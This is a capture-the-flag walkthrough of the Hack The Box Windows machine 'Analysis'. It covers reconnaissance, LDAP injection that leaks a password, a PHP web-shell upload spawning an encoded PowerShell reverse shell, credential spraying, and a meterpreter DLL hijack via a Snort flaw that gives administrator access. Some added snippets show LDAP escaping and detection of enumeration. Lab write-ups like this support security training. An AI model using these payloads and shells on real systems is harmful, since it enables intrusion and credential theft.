Overview of the Analysis Box
Engagement Phases
- Information gathering and reconnaissance
- Web service enumeration
- Web vulnerability analysis
- Initial access and web shell
- Lateral movement
- Privilege escalation
Phase I: Information Gathering
Initial Reconnaissance
Begin with a comprehensive nmap scan to identify active ports and services on the "Analysis" box.
Command:
nmap -sC -sV -O -T4 --min-rate=500 -oA nmap/analysis 10.10.11.250
Result Snapshot:
- Host Response: 10.10.11.250 is up (Latency: 0.26s).
- Majority of TCP Ports: Closed.
- Open Ports and Services:
- 53/tcp: Domain (Simple DNS Plus)
- 80/tcp: HTTP (Microsoft HTTPAPI httpd 2.0)
- 88/tcp: Kerberos Security (Microsoft Windows Kerberos)
- 135/tcp: Microsoft Windows RPC
- 139/tcp: NetBIOS Session (Microsoft Windows netbios-ssn)
- 389/tcp: LDAP (Microsoft Windows Active Directory LDAP)
- 445/tcp: Microsoft Directory Services
- 464/tcp: kpasswd5
- 593/tcp: Microsoft Windows RPC over HTTP
- 636/tcp, 3269/tcp: TCP Wrapped
- 3268/tcp: LDAP (Microsoft Windows Active Directory LDAP)
- 3306/tcp: MySQL (unauthorized)
- OS Detection: Inconclusive (Potential Windows OS)
- Host Script Results:
- SMB2 Protocol Negotiation Failed
Analysis: The scan reveals a typical Windows domain environment with services like Kerberos, LDAP, and Microsoft RPC. The unusual presence of a MySQL server and failed SMB2 negotiation suggest potential avenues for exploration.
Next Steps:
- DNS Mapping: Add analysis.htb to /etc/hosts.
- Web Application Assessment: Explore the web application on port 80 for vulnerabilities.
- Service Exploration: Investigate LDAP, Kerberos, and SMB services.
Phase II: HTTP Enumeration & Exploitation
Objective: Uncover web applications for initial access or crucial information.
After reviewing the analysis.htb landing page, which appeared largely static, the next step was to dig deeper for any potential entry points.

Tools & Techniques:
- DNS Enumeration: using tools such as dnsenum, gobuster, and a custom bash script.
- Commands Used:
* dnsenum: Enumerates DNS details.
dnsenum --dnsserver 10.10.11.250 --enum -p 0 -s 0 -o out.txt -f wordlist.txt analysis.htb
* gobuster: Brute-forces DNS subdomains.
gobuster dns -d analysis.htb -w wordlist.txt -r 10.10.11.250
* Bash script: Queries each candidate subdomain directly with dig (the wordlist is read line by line and the variables are quoted so names with unusual characters do not break the loop).
while read -r sub; do
  dig "$sub.analysis.htb" @10.10.11.250 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep "$sub" | tee -a out.txt
done < wordlist.txt
Outcome & Analysis:
The primary goal at this stage was to discover subdomains that might expose additional services or web applications.
Next Steps:
- Investigate any discovered subdomains.
- Pay special attention to internal.analysis.htb for further exploration.
The main page on internal.analysis.htb consistently returned 403 responses, and most guessed directories produced 404 errors. To systematically uncover hidden directories and PHP files, dirsearch was used against internal.analysis.htb.
Visual Insight: (screenshot not reproduced)
As expected, no meaningful content was exposed through simple browsing.
Uncovering Hidden Gems
dirsearch -q -r -u http://internal.analysis.htb/ -i 200,300-399 -e php
Findings: Discovered several directories and files, including login and user list endpoints.
After extensive enumeration, focus shifted to LDAP injection based on the earlier nmap results.
Visual Evidence: (screenshot not reproduced)
Parameter fuzzing:
ffuf -c -v -w parameters.txt -u "http://internal.analysis.htb/users/list.php?FUZZ=test"
- Found the name parameter.
- I discovered that name is vulnerable to LDAP injection.
Uncovering LDAP Injection
- Parameter Identification:
* While exploring http://internal.analysis.htb/users/list.php, the name parameter was identified.
* A critical observation was that the name parameter was susceptible to LDAP injection.
- Exploiting LDAP Injection:
* A series of fuzzing runs was conducted on the name parameter.
* This revealed two significant LDAP attributes: objectClass and description.
* The successful LDAP query structure was identified as (%26 is the URL-encoded &):
url?name=*)(%26(FUZZING=*)
url?name=*)(%26(objectClass=*)(FUZZING=*)
url?name=*)(%26(objectClass=*)(description=*)
# I think the full query looks like this:
(&(name=*)(objectClass=*)(description=*))
- Intriguingly, the objectClass attribute consistently held the value user, and the description attribute contained a lengthy string, interpreted as the password for the technician user.
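The following is an added example, not code from the write-up or from the box's list.php: it shows why the name parameter could be bent into the filter above (the value is spliced into the filter unescaped) and how RFC 4515 escaping of the value prevents it. The filter template (&(name=...)(objectClass=user)) is an assumption; the real server-side query is not on the page.

```python
# Added example (not from the write-up). The filter template is an assumption;
# the real list.php query is unknown. PAYLOAD is the URL-decoded value from above.
import re

PAYLOAD = "*)(&(objectClass=*)(description=*)"  # %26 decodes to '&'

def build_filter_unsafe(name: str) -> str:
    """Vulnerable: the request parameter is spliced straight into the filter."""
    return "(&(name=" + name + ")(objectClass=user))"

def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping: '*', '(', ')', '\\' and NUL become \\XX hex escapes,
    so the value can only ever be matched as a literal string."""
    return "".join("\\%02x" % ord(c) if c in "*()\\\x00" else c for c in value)

def build_filter_safe(name: str) -> str:
    """Hardened: same template, but the value is escaped first."""
    return "(&(name=" + escape_filter_value(name) + ")(objectClass=user))"

ATTR = re.compile(r"\(([A-Za-z][\w.;-]*)=")

def attributes_referenced(ldap_filter: str) -> list:
    """Attribute names asserted in the filter; an injected value shows up as
    extra attributes (objectClass, description) the app never meant to query."""
    return ATTR.findall(ldap_filter)

if __name__ == "__main__":
    unsafe, safe = build_filter_unsafe(PAYLOAD), build_filter_safe(PAYLOAD)
    print(unsafe, attributes_referenced(unsafe))
    print(safe, attributes_referenced(safe))
```

The unsafe build yields extra objectClass and description assertions; the escaped build keeps a single name assertion whose value is the literal payload text.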
To further exploit this discovery, a custom script, enhanced and tuned for this specific scenario and available on Hunt3r0x's GitHub, was used to extract the complete password.
Script Usage:
python3 fuzzer.py --charset allchars-wordlist.txt

Once valid credentials were obtained in the Windows environment, the next step was to evaluate their validity across common protocols.
User Enumeration:
- Employed kerbrute for user enumeration with the discovered credentials.
# Append the domain suffix to every user in users.txt
sed -i "s|$|@analysis.htb|" users.txt
# Then run the enumeration against the DC
kerbrute userenum -d analysis.htb users.txt --dc analysis.htb
- Found several users, including technician.
Kerbrute Output: (screenshot not reproduced)

Protocols Enumeration:
- Used crackmapexec to test the technician credentials against each protocol.
crackmapexec <PROTOCOL> 10.10.11.250 -u 'technician' -p 'password'
for protocol in mssql smb ldap ftp winrm ssh rdp; do crackmapexec "$protocol" 10.10.11.250 -u 'technician' -p 'password'; done
Nothing useful was found.
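As an added example (not part of the write-up), here is the defender's view of the kerbrute user enumeration run above: kerbrute sends AS-REQs without pre-authentication, so the DC records event 4768 with result 0x6 (client not found) for every guessed name and 0x19 (pre-auth required) for every real account, which makes a burst of 0x6 results from one source easy to flag. The field layout and the log lines are constructed for this example.

```python
# Added example (not from the write-up). The log format and sample lines below are
# constructed; real 4768 events come from the Security log with the same result codes.
import re
from collections import defaultdict

SAMPLE_LOG = """\
4768 src=10.10.14.5 user=administrator result=0x19
4768 src=10.10.14.5 user=technician result=0x19
4768 src=10.10.14.5 user=alice result=0x6
4768 src=10.10.14.5 user=bob result=0x6
4768 src=10.10.14.5 user=carol result=0x6
4768 src=10.10.14.5 user=dave result=0x6
4768 src=10.10.14.5 user=erin result=0x6
4768 src=10.10.11.10 user=jdoe result=0x0
4768 src=10.10.11.10 user=jdoe result=0x0
"""
LINE = re.compile(r"^4768 src=(\S+) user=(\S+) result=(0x[0-9A-Fa-f]+)$")

def parse_4768(text: str) -> list:
    """Return (source_ip, account, result_code) tuples for every 4768 line."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            events.append((m.group(1), m.group(2), m.group(3).lower()))
    return events

def find_enumeration(events: list, threshold: int = 5) -> dict:
    """Map each source that produced at least `threshold` distinct unknown
    principals (0x6) to (unknown_count, real accounts it also probed)."""
    unknown, probed = defaultdict(set), defaultdict(set)
    for src, user, code in events:
        if code == "0x6":
            unknown[src].add(user)
        elif code == "0x19":
            probed[src].add(user)
    return {src: (len(names), sorted(probed[src]))
            for src, names in unknown.items() if len(names) >= threshold}

if __name__ == "__main__":
    for src, (count, names) in find_enumeration(parse_4768(SAMPLE_LOG)).items():
        print(f"{src}: {count} unknown principals; valid names probed: {names}")
```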
Web Login:
- Successfully logged in with the discovered credentials at http://internal.analysis.htb/employees/login.php.
Exploiting File Upload
- Found and exploited a file upload function in the admin panel.
- Uploaded a test PHP file:
<?php echo "<h1>HELLO</h1>"; ?>

It worked:

Gaining reverse shell
<?php
// Upload this, but replace the placeholder with your own Base64-encoded PowerShell script
// (https://www.revshells.com/ can generate one)
system("powershell -e <PS script encoded with BASE64>");
?>
Then start your netcat listener and visit the uploaded shell.
netcat:
rlwrap -cAr nc -lvnp <PORT>
Reverse shell: Gained shell access as svc_web, with the user flag owned by the jdoe account.

Phase III: Privilege Escalation
Objective: To escalate privileges and gain higher-level access on the system.
Techniques & Tools:
- Initial Lateral Movement:
* Initially gained shell access as svc_web.
* The user flag was under jdoe's ownership.
- PowerShell Script for Privilege Escalation:
* Utilized the PrivescCheck PowerShell script. Upload the script to the machine:
# First, in your terminal
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
## And then open an HTTP server
python3 -m http.server <PORT>
# Second, in the gained shell
certutil -urlcache -f http://<TUN0>:<PORT>/PrivescCheck.ps1 PrivescCheck.ps1
- Executed the script with:
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format HTML"
- Discovered leaked credentials for jdoe in the Winlogon registry key.

- Credential Validation with CrackMapExec:
* Validated the discovered credentials using CrackMapExec.
crackmapexec <PROTOCOL> 10.10.11.250 -u 'user' -p 'password'
for protocol in mssql smb ldap ftp winrm ssh rdp; do crackmapexec "$protocol" 10.10.11.250 -u 'user' -p 'password'; done
- Confirmed the credentials' validity over the WinRM protocol.

- Accessing jdoe's Account with Evil-WinRM:
* Gained access to the jdoe account using Evil-WinRM:
evil-winrm -i 10.10.11.250 -u "jdoe" -p "password"
Successfully retrieved the user flag:

At this stage, the focus shifted from initial foothold to full privilege escalation on the host.
- Exploiting CVE-2016-1417 for Administrator Access:
- Identified the machine's vulnerability to CVE-2016-1417 (DLL hijacking in Snort 2.9.7.0-WIN32).
- Created a DLL payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=1337 -f dll > tcapi.dll
- Set up a listener in Metasploit:
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 1337
run
- Uploaded tcapi.dll to C:\snort\lib\snort_dynamicpreprocessor using jdoe's shell in Evil-WinRM.
upload tcapi.dll tcapi.dll # In Evil-WinRM
## If the upload is denied, remove the existing .dll files first
del *.dll
## Then upload again
upload tcapi.dll tcapi.dll
Gaining Full Administrative Access

- Successfully executed the DLL payload, exploiting the vulnerability.
- Obtained a Meterpreter shell with administrative privileges through DLL hijacking.